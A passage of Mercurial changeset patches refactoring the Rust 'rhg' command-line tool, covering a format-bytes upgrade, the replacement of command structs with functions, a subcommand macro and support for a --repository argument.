(registry+https://github.com/rust-lang/crates.io-index)", @@ -965,8 +965,8 @@ "checksum either 1.6.1 (registry+https://github.com/rust-lang/crates.io-index)" = "e78d4f1cc4ae33bbfc157ed5d5a5ef3bc29227303d595861deb238fcec4e9457" "checksum env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)" = "44533bbbb3bb3c1fa17d9f2e4e38bbbaf8396ba82193c4cb1b6445d711445d36" "checksum flate2 1.0.19 (registry+https://github.com/rust-lang/crates.io-index)" = "7411863d55df97a419aa64cb4d2f167103ea9d767e2c54a1868b7ac3f6b47129" -"checksum format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)" = "1a7374eb574cd29ae45878554298091c554c3286a17b3afa440a3e2710ae0790" -"checksum format-bytes-macros 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "4edcc04201cea17a0e6b937adebd46b93fba09924c7e6ed8c515a35ce8432cbc" +"checksum format-bytes 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)" = "cc35f5e45d6b31053cea13078ffc6fa52fa8617aa54b7ac2011720d9c009e04f" +"checksum format-bytes-macros 0.3.0 (registry+https://github.com/rust-lang/crates.io-index)" = "b05089e341a0460449e2210c3bf7b61597860b07f0deae58da38dbed0a4c6b6d" "checksum fuchsia-cprng 0.1.1 (registry+https://github.com/rust-lang/crates.io-index)" = "a06f77d526c1a601b7c4cdd98f54b5eaabffc14d5f2f0296febdc7f357c6d3ba" "checksum gcc 0.3.55 (registry+https://github.com/rust-lang/crates.io-index)" = "8f5f3913fa0bfe7ee1fd8248b6b9f42a5af4b9d65ec2dd2c3c26132b950ecfc2" "checksum getrandom 0.1.15 (registry+https://github.com/rust-lang/crates.io-index)" = "fc587bc0ec293155d5bfa6b9891ec18a1e330c234f896ea47fbada4cadbe47e6" diff --git a/rust/hg-core/Cargo.toml b/rust/hg-core/Cargo.toml --- a/rust/hg-core/Cargo.toml +++ b/rust/hg-core/Cargo.toml @@ -29,7 +29,7 @@ memmap = "0.7.0" zstd = "0.5.3" rust-crypto = "0.2.36" -format-bytes = "0.1.2" +format-bytes = "0.2.0" # We don't use the `miniz-oxide` backend to not change rhg benchmarks and until # we have a clearer view of which backend is the 
fastest. diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -12,6 +12,7 @@ ConfigError, ConfigLayer, ConfigParseError, ConfigValue, }; use crate::utils::files::get_bytes_from_path; +use format_bytes::{write_bytes, DisplayBytes}; use std::env; use std::path::{Path, PathBuf}; @@ -23,13 +24,22 @@ layers: Vec<layer::ConfigLayer>, } -impl std::fmt::Debug for Config { - fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { +impl DisplayBytes for Config { + fn display_bytes( + &self, + out: &mut dyn std::io::Write, + ) -> std::io::Result<()> { for (index, layer) in self.layers.iter().rev().enumerate() { - write!( - f, - "==== Layer {} (trusted: {}) ====\n{:?}", - index, layer.trusted, layer + write_bytes!( + out, + b"==== Layer {} (trusted: {}) ====\n{}", + index, + if layer.trusted { + &b"yes"[..] + } else { + &b"no"[..] + }, + layer )?; } Ok(()) diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -9,7 +9,7 @@ use crate::errors::{HgError, IoResultExt}; use crate::utils::files::{get_bytes_from_path, get_path_from_bytes}; -use format_bytes::format_bytes; +use format_bytes::{write_bytes, DisplayBytes}; use lazy_static::lazy_static; use regex::bytes::Regex; use std::collections::HashMap; @@ -165,8 +165,11 @@ } } -impl std::fmt::Debug for ConfigLayer { - fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { +impl DisplayBytes for ConfigLayer { + fn display_bytes( + &self, + out: &mut dyn std::io::Write, + ) -> std::io::Result<()> { let mut sections: Vec<_> = self.sections.iter().collect(); sections.sort_by(|e0, e1| e0.0.cmp(e1.0)); @@ -175,16 +178,13 @@ items.sort_by(|e0, e1| e0.0.cmp(e1.0)); for (item, config_entry) in items { - writeln!( - f, - "{}", - String::from_utf8_lossy(&format_bytes!( - b"{}.{}={} # {}", - section, - 
item, - &config_entry.bytes, - &self.origin.to_bytes(), - )) + write_bytes!( + out, + b"{}.{}={} # {}\n", + section, + item, + &config_entry.bytes, + &self.origin, )? } } @@ -224,13 +224,15 @@ * Others? */ } -impl ConfigOrigin { - /// TODO use some kind of dedicated trait? - pub fn to_bytes(&self) -> Vec<u8> { +impl DisplayBytes for ConfigOrigin { + fn display_bytes( + &self, + out: &mut dyn std::io::Write, + ) -> std::io::Result<()> { match self { - ConfigOrigin::File(p) => get_bytes_from_path(p), - ConfigOrigin::CommandLine => b"--config".to_vec(), - ConfigOrigin::Environment(e) => format_bytes!(b"${}", e), + ConfigOrigin::File(p) => out.write_all(&get_bytes_from_path(p)), + ConfigOrigin::CommandLine => out.write_all(b"--config"), + ConfigOrigin::Environment(e) => write_bytes!(out, b"${}", e), } } } diff --git a/rust/rhg/Cargo.toml b/rust/rhg/Cargo.toml --- a/rust/rhg/Cargo.toml +++ b/rust/rhg/Cargo.toml @@ -14,4 +14,4 @@ log = "0.4.11" micro-timer = "0.3.1" env_logger = "0.7.1" -format-bytes = "0.1.3" +format-bytes = "0.2.0" diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -90,7 +90,7 @@ CommandError::Abort { message: format_bytes!( b"config parse error in {}{}: '{}'", - origin.to_bytes(), + origin, line_message, bytes ), # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612812784 -3600 # Mon Feb 08 20:33:04 2021 +0100 # Node ID 184e46550dc89b317820b5cf4b122c37df81bdd3 # Parent eace48b4a78655502a91bcf7d6f3bdeb50fd8d6e rhg: replace command structs with functions The `Command` trait was not used in any generic context, and the struct where nothing more than holders for values parsed from CLI arguments to be available to a `run` method. 
Differential Revision: https://phab.mercurial-scm.org/D9967 diff --git a/rust/rhg/src/commands.rs b/rust/rhg/src/commands.rs --- a/rust/rhg/src/commands.rs +++ b/rust/rhg/src/commands.rs @@ -3,13 +3,3 @@ pub mod debugrequirements; pub mod files; pub mod root; -use crate::error::CommandError; -use crate::ui::Ui; -use hg::config::Config; - -/// The common trait for rhg commands -/// -/// Normalize the interface of the commands provided by rhg -pub trait Command { - fn run(&self, ui: &Ui, config: &Config) -> Result<(), CommandError>; -} diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -1,6 +1,6 @@ -use crate::commands::Command; use crate::error::CommandError; use crate::ui::Ui; +use clap::ArgMatches; use hg::config::Config; use hg::operations::cat; use hg::repo::Repo; @@ -12,47 +12,40 @@ Output the current or given revision of files "; -pub struct CatCommand<'a> { - rev: Option<&'a str>, - files: Vec<&'a str>, -} +#[timed] +pub fn run( + ui: &Ui, + config: &Config, + args: &ArgMatches, +) -> Result<(), CommandError> { + let rev = args.value_of("rev"); + let file_args = match args.values_of("files") { + Some(files) => files.collect(), + None => vec![], + }; -impl<'a> CatCommand<'a> { - pub fn new(rev: Option<&'a str>, files: Vec<&'a str>) -> Self { - Self { rev, files } + let repo = Repo::find(config)?; + let cwd = hg::utils::current_dir()?; + + let mut files = vec![]; + for file in file_args.iter() { + // TODO: actually normalize `..` path segments etc? 
+ let normalized = cwd.join(&file); + let stripped = normalized + .strip_prefix(&repo.working_directory_path()) + // TODO: error message for path arguments outside of the repo + .map_err(|_| CommandError::abort(""))?; + let hg_file = HgPathBuf::try_from(stripped.to_path_buf()) + .map_err(|e| CommandError::abort(e.to_string()))?; + files.push(hg_file); } - fn display(&self, ui: &Ui, data: &[u8]) -> Result<(), CommandError> { - ui.write_stdout(data)?; - Ok(()) + match rev { + Some(rev) => { + let data = cat(&repo, rev, &files).map_err(|e| (e, rev))?; + ui.write_stdout(&data)?; + Ok(()) + } + None => Err(CommandError::Unimplemented.into()), } } - -impl<'a> Command for CatCommand<'a> { - #[timed] - fn run(&self, ui: &Ui, config: &Config) -> Result<(), CommandError> { - let repo = Repo::find(config)?; - let cwd = hg::utils::current_dir()?; - - let mut files = vec![]; - for file in self.files.iter() { - // TODO: actually normalize `..` path segments etc? - let normalized = cwd.join(&file); - let stripped = normalized - .strip_prefix(&repo.working_directory_path()) - // TODO: error message for path arguments outside of the repo - .map_err(|_| CommandError::abort(""))?; - let hg_file = HgPathBuf::try_from(stripped.to_path_buf()) - .map_err(|e| CommandError::abort(e.to_string()))?; - files.push(hg_file); - } - - match self.rev { - Some(rev) => { - let data = cat(&repo, rev, &files).map_err(|e| (e, rev))?; - self.display(ui, &data) - } - None => Err(CommandError::Unimplemented.into()), - } - } -} diff --git a/rust/rhg/src/commands/debugdata.rs b/rust/rhg/src/commands/debugdata.rs --- a/rust/rhg/src/commands/debugdata.rs +++ b/rust/rhg/src/commands/debugdata.rs @@ -1,6 +1,6 @@ -use crate::commands::Command; use crate::error::CommandError; use crate::ui::Ui; +use clap::ArgMatches; use hg::config::Config; use hg::operations::{debug_data, DebugDataKind}; use hg::repo::Repo; @@ -10,28 +10,33 @@ Dump the contents of a data file revision "; -pub struct DebugDataCommand<'a> { - rev: 
&'a str, - kind: DebugDataKind, -} - -impl<'a> DebugDataCommand<'a> { - pub fn new(rev: &'a str, kind: DebugDataKind) -> Self { - DebugDataCommand { rev, kind } - } -} +#[timed] +pub fn run( + ui: &Ui, + config: &Config, + args: &ArgMatches, +) -> Result<(), CommandError> { + let rev = args + .value_of("rev") + .expect("rev should be a required argument"); + let kind = + match (args.is_present("changelog"), args.is_present("manifest")) { + (true, false) => DebugDataKind::Changelog, + (false, true) => DebugDataKind::Manifest, + (true, true) => { + unreachable!("Should not happen since options are exclusive") + } + (false, false) => { + unreachable!("Should not happen since options are required") + } + }; -impl<'a> Command for DebugDataCommand<'a> { - #[timed] - fn run(&self, ui: &Ui, config: &Config) -> Result<(), CommandError> { - let repo = Repo::find(config)?; - let data = debug_data(&repo, self.rev, self.kind) - .map_err(|e| (e, self.rev))?; + let repo = Repo::find(config)?; + let data = debug_data(&repo, rev, kind).map_err(|e| (e, rev))?; - let mut stdout = ui.stdout_buffer(); - stdout.write_all(&data)?; - stdout.flush()?; + let mut stdout = ui.stdout_buffer(); + stdout.write_all(&data)?; + stdout.flush()?; - Ok(()) - } + Ok(()) } diff --git a/rust/rhg/src/commands/debugrequirements.rs b/rust/rhg/src/commands/debugrequirements.rs --- a/rust/rhg/src/commands/debugrequirements.rs +++ b/rust/rhg/src/commands/debugrequirements.rs @@ -1,6 +1,6 @@ -use crate::commands::Command; use crate::error::CommandError; use crate::ui::Ui; +use clap::ArgMatches; use hg::config::Config; use hg::repo::Repo; @@ -8,25 +8,19 @@ Print the current repo requirements. 
"; -pub struct DebugRequirementsCommand {} - -impl DebugRequirementsCommand { - pub fn new() -> Self { - DebugRequirementsCommand {} +pub fn run( + ui: &Ui, + config: &Config, + _args: &ArgMatches, +) -> Result<(), CommandError> { + let repo = Repo::find(config)?; + let mut output = String::new(); + let mut requirements: Vec<_> = repo.requirements().iter().collect(); + requirements.sort(); + for req in requirements { + output.push_str(req); + output.push('\n'); } + ui.write_stdout(output.as_bytes())?; + Ok(()) } - -impl Command for DebugRequirementsCommand { - fn run(&self, ui: &Ui, config: &Config) -> Result<(), CommandError> { - let repo = Repo::find(config)?; - let mut output = String::new(); - let mut requirements: Vec<_> = repo.requirements().iter().collect(); - requirements.sort(); - for req in requirements { - output.push_str(req); - output.push('\n'); - } - ui.write_stdout(output.as_bytes())?; - Ok(()) - } -} diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -1,6 +1,6 @@ -use crate::commands::Command; use crate::error::CommandError; use crate::ui::Ui; +use clap::ArgMatches; use hg::config::Config; use hg::operations::list_rev_tracked_files; use hg::operations::Dirstate; @@ -14,49 +14,42 @@ Returns 0 on success. 
"; -pub struct FilesCommand<'a> { - rev: Option<&'a str>, -} - -impl<'a> FilesCommand<'a> { - pub fn new(rev: Option<&'a str>) -> Self { - FilesCommand { rev } - } +pub fn run( + ui: &Ui, + config: &Config, + args: &ArgMatches, +) -> Result<(), CommandError> { + let rev = args.value_of("rev"); - fn display_files( - &self, - ui: &Ui, - repo: &Repo, - files: impl IntoIterator<Item = &'a HgPath>, - ) -> Result<(), CommandError> { - let cwd = hg::utils::current_dir()?; - let rooted_cwd = cwd - .strip_prefix(repo.working_directory_path()) - .expect("cwd was already checked within the repository"); - let rooted_cwd = HgPathBuf::from(get_bytes_from_path(rooted_cwd)); - - let mut stdout = ui.stdout_buffer(); - - for file in files { - stdout.write_all(relativize_path(file, &rooted_cwd).as_ref())?; - stdout.write_all(b"\n")?; - } - stdout.flush()?; - Ok(()) + let repo = Repo::find(config)?; + if let Some(rev) = rev { + let files = + list_rev_tracked_files(&repo, rev).map_err(|e| (e, rev))?; + display_files(ui, &repo, files.iter()) + } else { + let distate = Dirstate::new(&repo)?; + let files = distate.tracked_files()?; + display_files(ui, &repo, files) } } -impl<'a> Command for FilesCommand<'a> { - fn run(&self, ui: &Ui, config: &Config) -> Result<(), CommandError> { - let repo = Repo::find(config)?; - if let Some(rev) = self.rev { - let files = - list_rev_tracked_files(&repo, rev).map_err(|e| (e, rev))?; - self.display_files(ui, &repo, files.iter()) - } else { - let distate = Dirstate::new(&repo)?; - let files = distate.tracked_files()?; - self.display_files(ui, &repo, files) - } +fn display_files<'a>( + ui: &Ui, + repo: &Repo, + files: impl IntoIterator<Item = &'a HgPath>, +) -> Result<(), CommandError> { + let cwd = hg::utils::current_dir()?; + let rooted_cwd = cwd + .strip_prefix(repo.working_directory_path()) + .expect("cwd was already checked within the repository"); + let rooted_cwd = HgPathBuf::from(get_bytes_from_path(rooted_cwd)); + + let mut stdout = 
ui.stdout_buffer(); + + for file in files { + stdout.write_all(relativize_path(file, &rooted_cwd).as_ref())?; + stdout.write_all(b"\n")?; } + stdout.flush()?; + Ok(()) } diff --git a/rust/rhg/src/commands/root.rs b/rust/rhg/src/commands/root.rs --- a/rust/rhg/src/commands/root.rs +++ b/rust/rhg/src/commands/root.rs @@ -1,6 +1,6 @@ -use crate::commands::Command; use crate::error::CommandError; use crate::ui::Ui; +use clap::ArgMatches; use format_bytes::format_bytes; use hg::config::Config; use hg::repo::Repo; @@ -12,19 +12,13 @@ Returns 0 on success. "; -pub struct RootCommand {} - -impl RootCommand { - pub fn new() -> Self { - RootCommand {} - } +pub fn run( + ui: &Ui, + config: &Config, + _args: &ArgMatches, +) -> Result<(), CommandError> { + let repo = Repo::find(config)?; + let bytes = get_bytes_from_path(repo.working_directory_path()); + ui.write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?; + Ok(()) } - -impl Command for RootCommand { - fn run(&self, ui: &Ui, config: &Config) -> Result<(), CommandError> { - let repo = Repo::find(config)?; - let bytes = get_bytes_from_path(repo.working_directory_path()); - ui.write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?; - Ok(()) - } -} diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -6,14 +6,11 @@ use clap::ArgMatches; use clap::SubCommand; use format_bytes::format_bytes; -use hg::operations::DebugDataKind; -use std::convert::TryFrom; mod commands; mod error; mod exitcode; mod ui; -use commands::Command; use error::CommandError; fn main() { @@ -126,69 +123,15 @@ let config = hg::config::Config::load()?; match matches.subcommand() { - ("root", _) => commands::root::RootCommand::new().run(&ui, &config), - ("files", Some(matches)) => { - commands::files::FilesCommand::try_from(matches)?.run(&ui, &config) - } - ("cat", Some(matches)) => { - commands::cat::CatCommand::try_from(matches)?.run(&ui, &config) + ("root", Some(matches)) => 
commands::root::run(ui, &config, matches), + ("files", Some(matches)) => commands::files::run(ui, &config, matches), + ("cat", Some(matches)) => commands::cat::run(ui, &config, matches), + ("debugdata", Some(matches)) => { + commands::debugdata::run(ui, &config, matches) } - ("debugdata", Some(matches)) => { - commands::debugdata::DebugDataCommand::try_from(matches)? - .run(&ui, &config) - } - ("debugrequirements", _) => { - commands::debugrequirements::DebugRequirementsCommand::new() - .run(&ui, &config) + ("debugrequirements", Some(matches)) => { + commands::debugrequirements::run(ui, &config, matches) } _ => unreachable!(), // Because of AppSettings::SubcommandRequired, } } - -impl<'a> TryFrom<&'a ArgMatches<'_>> for commands::files::FilesCommand<'a> { - type Error = CommandError; - - fn try_from(args: &'a ArgMatches) -> Result<Self, Self::Error> { - let rev = args.value_of("rev"); - Ok(commands::files::FilesCommand::new(rev)) - } -} - -impl<'a> TryFrom<&'a ArgMatches<'_>> for commands::cat::CatCommand<'a> { - type Error = CommandError; - - fn try_from(args: &'a ArgMatches) -> Result<Self, Self::Error> { - let rev = args.value_of("rev"); - let files = match args.values_of("files") { - Some(files) => files.collect(), - None => vec![], - }; - Ok(commands::cat::CatCommand::new(rev, files)) - } -} - -impl<'a> TryFrom<&'a ArgMatches<'_>> - for commands::debugdata::DebugDataCommand<'a> -{ - type Error = CommandError; - - fn try_from(args: &'a ArgMatches) -> Result<Self, Self::Error> { - let rev = args - .value_of("rev") - .expect("rev should be a required argument"); - let kind = match ( - args.is_present("changelog"), - args.is_present("manifest"), - ) { - (true, false) => DebugDataKind::Changelog, - (false, true) => DebugDataKind::Manifest, - (true, true) => { - unreachable!("Should not happen since options are exclusive") - } - (false, false) => { - unreachable!("Should not happen since options are required") - } - }; - 
Ok(commands::debugdata::DebugDataCommand::new(rev, kind)) - } -} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612814736 -3600 # Mon Feb 08 21:05:36 2021 +0100 # Node ID 1ecaf09d996412e2589ce8e3c69a8a3d7af01a4f # Parent 184e46550dc89b317820b5cf4b122c37df81bdd3 rhg: Move subcommand CLI arguments definitions to respective modules Differential Revision: https://phab.mercurial-scm.org/D9968 diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -1,5 +1,6 @@ use crate::error::CommandError; use crate::ui::Ui; +use clap::Arg; use clap::ArgMatches; use hg::config::Config; use hg::operations::cat; @@ -12,6 +13,27 @@ Output the current or given revision of files "; +pub fn args() -> clap::App<'static, 'static> { + clap::SubCommand::with_name("cat") + .arg( + Arg::with_name("rev") + .help("search the repository as it is in REV") + .short("-r") + .long("--revision") + .value_name("REV") + .takes_value(true), + ) + .arg( + clap::Arg::with_name("files") + .required(true) + .multiple(true) + .empty_values(false) + .value_name("FILE") + .help("Activity to start: activity@category"), + ) + .about(HELP_TEXT) +} + #[timed] pub fn run( ui: &Ui, diff --git a/rust/rhg/src/commands/debugdata.rs b/rust/rhg/src/commands/debugdata.rs --- a/rust/rhg/src/commands/debugdata.rs +++ b/rust/rhg/src/commands/debugdata.rs @@ -1,5 +1,7 @@ use crate::error::CommandError; use crate::ui::Ui; +use clap::Arg; +use clap::ArgGroup; use clap::ArgMatches; use hg::config::Config; use hg::operations::{debug_data, DebugDataKind}; @@ -10,6 +12,34 @@ Dump the contents of a data file revision "; +pub fn args() -> clap::App<'static, 'static> { + clap::SubCommand::with_name("debugdata") + .arg( + Arg::with_name("changelog") + .help("open changelog") + .short("-c") + .long("--changelog"), + ) + .arg( + Arg::with_name("manifest") + .help("open manifest") + .short("-m") + .long("--manifest"), + ) + 
.group( + ArgGroup::with_name("") + .args(&["changelog", "manifest"]) + .required(true), + ) + .arg( + Arg::with_name("rev") + .help("revision") + .required(true) + .value_name("REV"), + ) + .about(HELP_TEXT) +} + #[timed] pub fn run( ui: &Ui, diff --git a/rust/rhg/src/commands/debugrequirements.rs b/rust/rhg/src/commands/debugrequirements.rs --- a/rust/rhg/src/commands/debugrequirements.rs +++ b/rust/rhg/src/commands/debugrequirements.rs @@ -8,6 +8,10 @@ Print the current repo requirements. "; +pub fn args() -> clap::App<'static, 'static> { + clap::SubCommand::with_name("debugrequirements").about(HELP_TEXT) +} + pub fn run( ui: &Ui, config: &Config, diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -1,5 +1,6 @@ use crate::error::CommandError; use crate::ui::Ui; +use clap::Arg; use clap::ArgMatches; use hg::config::Config; use hg::operations::list_rev_tracked_files; @@ -14,6 +15,19 @@ Returns 0 on success. "; +pub fn args() -> clap::App<'static, 'static> { + clap::SubCommand::with_name("files") + .arg( + Arg::with_name("rev") + .help("search the repository as it is in REV") + .short("-r") + .long("--revision") + .value_name("REV") + .takes_value(true), + ) + .about(HELP_TEXT) +} + pub fn run( ui: &Ui, config: &Config, diff --git a/rust/rhg/src/commands/root.rs b/rust/rhg/src/commands/root.rs --- a/rust/rhg/src/commands/root.rs +++ b/rust/rhg/src/commands/root.rs @@ -12,6 +12,10 @@ Returns 0 on success. 
"; +pub fn args() -> clap::App<'static, 'static> { + clap::SubCommand::with_name("root").about(HELP_TEXT) +} + pub fn run( ui: &Ui, config: &Config, diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -1,10 +1,7 @@ extern crate log; use clap::App; use clap::AppSettings; -use clap::Arg; -use clap::ArgGroup; use clap::ArgMatches; -use clap::SubCommand; use format_bytes::format_bytes; mod commands; @@ -20,72 +17,11 @@ .setting(AppSettings::SubcommandRequired) .setting(AppSettings::VersionlessSubcommands) .version("0.0.1") - .subcommand( - SubCommand::with_name("root").about(commands::root::HELP_TEXT), - ) - .subcommand( - SubCommand::with_name("files") - .arg( - Arg::with_name("rev") - .help("search the repository as it is in REV") - .short("-r") - .long("--revision") - .value_name("REV") - .takes_value(true), - ) - .about(commands::files::HELP_TEXT), - ) - .subcommand( - SubCommand::with_name("cat") - .arg( - Arg::with_name("rev") - .help("search the repository as it is in REV") - .short("-r") - .long("--revision") - .value_name("REV") - .takes_value(true), - ) - .arg( - clap::Arg::with_name("files") - .required(true) - .multiple(true) - .empty_values(false) - .value_name("FILE") - .help("Activity to start: activity@category"), - ) - .about(commands::cat::HELP_TEXT), - ) - .subcommand( - SubCommand::with_name("debugdata") - .about(commands::debugdata::HELP_TEXT) - .arg( - Arg::with_name("changelog") - .help("open changelog") - .short("-c") - .long("--changelog"), - ) - .arg( - Arg::with_name("manifest") - .help("open manifest") - .short("-m") - .long("--manifest"), - ) - .group( - ArgGroup::with_name("") - .args(&["changelog", "manifest"]) - .required(true), - ) - .arg( - Arg::with_name("rev") - .help("revision") - .required(true) - .value_name("REV"), - ), - ) - .subcommand( - SubCommand::with_name("debugrequirements") - .about(commands::debugrequirements::HELP_TEXT), - ); + 
.subcommand(commands::root::args()) + .subcommand(commands::files::args()) + .subcommand(commands::cat::args()) + .subcommand(commands::debugdata::args()) + .subcommand(commands::debugrequirements::args()); let matches = app.clone().get_matches_safe().unwrap_or_else(|err| { let _ = ui::Ui::new().writeln_stderr_str(&err.message); # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612816132 -3600 # Mon Feb 08 21:28:52 2021 +0100 # Node ID 95d37db31479de3ba2f8f2d3b64ec46781aaeb1a # Parent 1ecaf09d996412e2589ce8e3c69a8a3d7af01a4f rhg: Replace subcommand boilerplate with a macro This removes some repetition, and will avoid additional repetition in the next commit. Differential Revision: https://phab.mercurial-scm.org/D9969 diff --git a/rust/rhg/src/commands.rs b/rust/rhg/src/commands.rs deleted file mode 100644 --- a/rust/rhg/src/commands.rs +++ /dev/null @@ -1,5 +0,0 @@ -pub mod cat; -pub mod debugdata; -pub mod debugrequirements; -pub mod files; -pub mod root; diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -4,7 +4,6 @@ use clap::ArgMatches; use format_bytes::format_bytes; -mod commands; mod error; mod exitcode; mod ui; @@ -16,23 +15,27 @@ .setting(AppSettings::AllowInvalidUtf8) .setting(AppSettings::SubcommandRequired) .setting(AppSettings::VersionlessSubcommands) - .version("0.0.1") - .subcommand(commands::root::args()) - .subcommand(commands::files::args()) - .subcommand(commands::cat::args()) - .subcommand(commands::debugdata::args()) - .subcommand(commands::debugrequirements::args()); - - let matches = app.clone().get_matches_safe().unwrap_or_else(|err| { - let _ = ui::Ui::new().writeln_stderr_str(&err.message); - std::process::exit(exitcode::UNIMPLEMENTED) - }); + .version("0.0.1"); + let app = add_subcommand_args(app); let ui = ui::Ui::new(); - let command_result = match_subcommand(matches, &ui); + let matches = app.clone().get_matches_safe().unwrap_or_else(|err| { + let _ 
= ui.writeln_stderr_str(&err.message); + std::process::exit(exitcode::UNIMPLEMENTED) + }); + let (subcommand_name, subcommand_matches) = matches.subcommand(); + let run = subcommand_run_fn(subcommand_name) + .expect("unknown subcommand name from clap despite AppSettings::SubcommandRequired"); + let args = subcommand_matches + .expect("no subcommand arguments from clap despite AppSettings::SubcommandRequired"); - let exit_code = match command_result { + let result = (|| -> Result<(), CommandError> { + let config = hg::config::Config::load()?; + run(&ui, &config, args) + })(); + + let exit_code = match result { Ok(_) => exitcode::OK, // Exit with a specific code and no error message to let a potential @@ -52,22 +55,40 @@ std::process::exit(exit_code) } -fn match_subcommand( - matches: ArgMatches, - ui: &ui::Ui, -) -> Result<(), CommandError> { - let config = hg::config::Config::load()?; +macro_rules! subcommands { + ($( $command: ident )+) => { + mod commands { + $( + pub mod $command; + )+ + } + + fn add_subcommand_args<'a, 'b>(app: App<'a, 'b>) -> App<'a, 'b> { + app + $( + .subcommand(commands::$command::args()) + )+ + } - match matches.subcommand() { - ("root", Some(matches)) => commands::root::run(ui, &config, matches), - ("files", Some(matches)) => commands::files::run(ui, &config, matches), - ("cat", Some(matches)) => commands::cat::run(ui, &config, matches), - ("debugdata", Some(matches)) => { - commands::debugdata::run(ui, &config, matches) + fn subcommand_run_fn(name: &str) -> Option<fn( + &ui::Ui, + &hg::config::Config, + &ArgMatches, + ) -> Result<(), CommandError>> { + match name { + $( + stringify!($command) => Some(commands::$command::run), + )+ + _ => None, + } } - ("debugrequirements", Some(matches)) => { - commands::debugrequirements::run(ui, &config, matches) - } - _ => unreachable!(), // Because of AppSettings::SubcommandRequired, - } + }; } + +subcommands! 
{ + cat + debugdata + debugrequirements + files + root +} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612816650 -3600 # Mon Feb 08 21:37:30 2021 +0100 # Node ID d8730ff51d5a97dba40046b9a6cac0a66a7e16b6 # Parent 95d37db31479de3ba2f8f2d3b64ec46781aaeb1a rhg: Add support for -R and --repository command-line arguments Differential Revision: https://phab.mercurial-scm.org/D9970 diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -1,6 +1,7 @@ use crate::config::{Config, ConfigError, ConfigParseError}; use crate::errors::{HgError, IoResultExt}; use crate::requirements; +use crate::utils::current_dir; use crate::utils::files::get_path_from_bytes; use memmap::{Mmap, MmapOptions}; use std::collections::HashSet; @@ -18,7 +19,7 @@ #[derive(Debug, derive_more::From)] pub enum RepoError { NotFound { - current_directory: PathBuf, + at: PathBuf, }, #[from] ConfigParseError(ConfigParseError), @@ -44,15 +45,36 @@ impl Repo { /// Search the current directory and its ancestores for a repository: /// a working directory that contains a `.hg` sub-directory. - pub fn find(config: &Config) -> Result<Self, RepoError> { - let current_directory = crate::utils::current_dir()?; - // ancestors() is inclusive: it first yields `current_directory` as-is. - for ancestor in current_directory.ancestors() { - if ancestor.join(".hg").is_dir() { - return Ok(Self::new_at_path(ancestor.to_owned(), config)?); + /// + /// `explicit_path` is for `--repository` command-line arguments. 
+ pub fn find( + config: &Config, + explicit_path: Option<&Path>, + ) -> Result<Self, RepoError> { + if let Some(root) = explicit_path { + // Having an absolute path isn’t necessary here but can help code + // elsewhere + let root = current_dir()?.join(root); + if root.join(".hg").is_dir() { + Self::new_at_path(root, config) + } else { + Err(RepoError::NotFound { + at: root.to_owned(), + }) } + } else { + let current_directory = crate::utils::current_dir()?; + // ancestors() is inclusive: it first yields `current_directory` + // as-is. + for ancestor in current_directory.ancestors() { + if ancestor.join(".hg").is_dir() { + return Self::new_at_path(ancestor.to_owned(), config); + } + } + Err(RepoError::NotFound { + at: current_directory, + }) } - Err(RepoError::NotFound { current_directory }) } /// To be called after checking that `.hg` is a sub-directory diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -8,6 +8,7 @@ use hg::utils::hg_path::HgPathBuf; use micro_timer::timed; use std::convert::TryFrom; +use std::path::Path; pub const HELP_TEXT: &str = " Output the current or given revision of files @@ -38,6 +39,7 @@ pub fn run( ui: &Ui, config: &Config, + repo_path: Option<&Path>, args: &ArgMatches, ) -> Result<(), CommandError> { let rev = args.value_of("rev"); @@ -46,7 +48,7 @@ None => vec![], }; - let repo = Repo::find(config)?; + let repo = Repo::find(config, repo_path)?; let cwd = hg::utils::current_dir()?; let mut files = vec![]; diff --git a/rust/rhg/src/commands/debugdata.rs b/rust/rhg/src/commands/debugdata.rs --- a/rust/rhg/src/commands/debugdata.rs +++ b/rust/rhg/src/commands/debugdata.rs @@ -7,6 +7,7 @@ use hg::operations::{debug_data, 